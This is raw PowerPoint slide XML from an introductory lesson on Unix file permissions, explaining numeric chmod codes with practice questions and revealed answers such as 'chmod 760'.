        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25474596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Changing Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</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nnn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;filename&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>In this case, each n is a number from 0-7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="30000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> n sets permissions for the owner (you)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="30000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> n sets permissions for group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="30000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> n sets permissions for global </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="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1828800" y="4603699"/>
            <a:ext cx="5486400" cy="1847850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12619238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 Codes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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Read: 4 Write: 2 Execute: 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>By adding the numbers corresponding to the permissions you want, you can give different combinations of permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Read + Write = 4 + 2 = 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Read + Write + Execute = 4 + 2 + 1 = 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>No permissions = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What permissions would you give with a 5?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>With a 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2238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Philosophy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="Image result for unix philosop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2072640"/>
            <a:ext cx="80962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9432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 Codes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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Read: 4 Write: 2 Execute: 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>By adding the numbers corresponding to the permissions you want, you can give different combinations of permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Read + Write = 4 + 2 = 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Read + Write + Execute = 4 + 2 + 1 = 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>No permissions = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What permissions would you give with a 5? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Read and Execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>With a 3? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9200692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 Codes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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Read: 4 Write: 2 Execute: 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>By adding the numbers corresponding to the permissions you want, you can give different combinations of permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Read + Write = 4 + 2 = 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Read + Write + Execute = 4 + 2 + 1 = 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>No permissions = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What permissions would you give with a 5? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Read and Execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>With a 3? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Write and Execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000"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554568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Changing Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825625"/>
            <a:ext cx="7886700" cy="4762552"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If you want to give the OWNER ALL permissions, the group READ and WRITE permissions, and GLOBAL NO permissions, what code would you use?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ??? &lt;filename&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What permissions does each user have for the following file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-w---x</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smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>What permissions does each user have for the following code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>567</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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1311856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Changing Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825625"/>
            <a:ext cx="7886700" cy="4762552"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If you want to give the OWNER ALL permissions, the group READ and WRITE permissions, and GLOBAL NO permissions, what code would you use?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ??? &lt;filename&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 760 &lt;filename&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What permissions does each user have for the following file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-w---x</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smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>What permissions does each user have for the following code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>567</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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42495454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Changing Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825625"/>
            <a:ext cx="7886700" cy="4762552"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If you want to give the OWNER ALL permissions, the group READ and WRITE permissions, and GLOBAL NO permissions, what code would you use?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ??? &lt;filename&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 760 &lt;filename&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What permissions does each user have for the following file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-w---x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Owner: Read/Write/Execute; Group: Write; Global: Execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2308E8"/>
              </a:solidFill>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>What permissions does each user have for the following code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>567</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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36709610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Changing Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825625"/>
            <a:ext cx="7886700" cy="4762552"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If you want to give the OWNER ALL permissions, the group READ and WRITE permissions, and GLOBAL NO permissions, what code would you use?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ??? &lt;filename&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 760 &lt;filename&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What permissions does each user have for the following file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
